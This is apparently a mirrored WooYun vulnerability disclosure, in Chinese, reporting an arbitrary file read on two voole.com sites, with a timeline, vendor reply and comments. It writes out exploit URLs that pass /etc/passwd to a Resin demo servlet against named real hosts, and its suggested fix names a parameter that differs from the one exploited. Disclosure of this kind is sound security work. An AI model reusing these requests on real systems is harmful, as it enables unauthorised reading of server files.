优朋普乐任意文件读取高危漏洞

admin

139701
文章

114
评论

2017年4月29日19:47:59评论485 views字数 229阅读0分45秒阅读模式

摘要

2016-04-14：细节已通知厂商并且等待厂商处理中
2016-04-14：厂商已经确认，细节仅向厂商公开
2016-04-15：厂商已经修复漏洞并主动公开，细节向公众公开

漏洞概要关注数(13) 关注此漏洞

缺陷编号： WooYun-2016-190166

漏洞标题：优朋普乐任意文件读取高危漏洞

漏洞作者：卡卡西

提交时间： 2016-04-14 15:06

修复时间： 2016-04-15 10:17

公开时间： 2016-04-15 10:17

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank： 15

漏洞状态：厂商已经修复

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：任意文件读取

0人收藏

漏洞详情

披露状态：

2016-04-14：细节已通知厂商并且等待厂商处理中
2016-04-14：厂商已经确认，细节仅向厂商公开
2016-04-15：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

优朋普乐任意文件读取高危漏洞

详细说明：

优朋普乐两个站点存在任意文件读取漏洞，连接如下：

漏洞1：http://sms.voole.com//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd

漏洞2：http://wap.voole.com//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd

漏洞证明：

漏洞1：

漏洞2：

修复方案：

templateId参数过滤

版权声明：转载请注明来源卡卡西@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2016-04-14 16:05

厂商回复：

非常感谢白帽子卡卡西对优朋安全的友情检测，该问题正在处理当中，也希望各位白帽子能多多关注优朋安全。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

50%

评价

2016-04-15 09:37 | 卡卡西 ( 实习白帽子 | Rank:49 漏洞数:10 | 低调学习)

3

厂商很友好

1# 回复此人
2016-04-15 19:05 | 欧尼酱 ( 路人 | Rank:15 漏洞数:7 | 技术马马虎虎)

1

厂商好评

2# 回复此人
2016-04-16 16:51 | Discover ( 实习白帽子 | Rank:37 漏洞数:15 )

1

厂商很友好,rank也不高。

3# 回复此人
2016-04-16 22:05 | monburan ( 路人 | Rank:6 漏洞数:3 | 对这个世界的知识充满好奇)

1

厂商态度真好

4# 回复此人
2016-04-18 08:58 | Rand0m ( 实习白帽子 | Rank:42 漏洞数:11 | 竟然还有人冒充我，醉了，骗子QQ：44569754...)

1

良心厂商

5# 回复此人
2016-05-01 13:14 | 菜鸟小Q ( 普通白帽子 | Rank:205 漏洞数:56 | 坚定自己的信仰并一直做下去......)

0

厂商真理解白帽子

6# 回复此人

漏洞概要 关注数(13) 关注此漏洞

缺陷编号： WooYun-2016-190166

漏洞标题： 优朋普乐任意文件读取高危漏洞

相关厂商： voole.com

漏洞作者： 卡卡西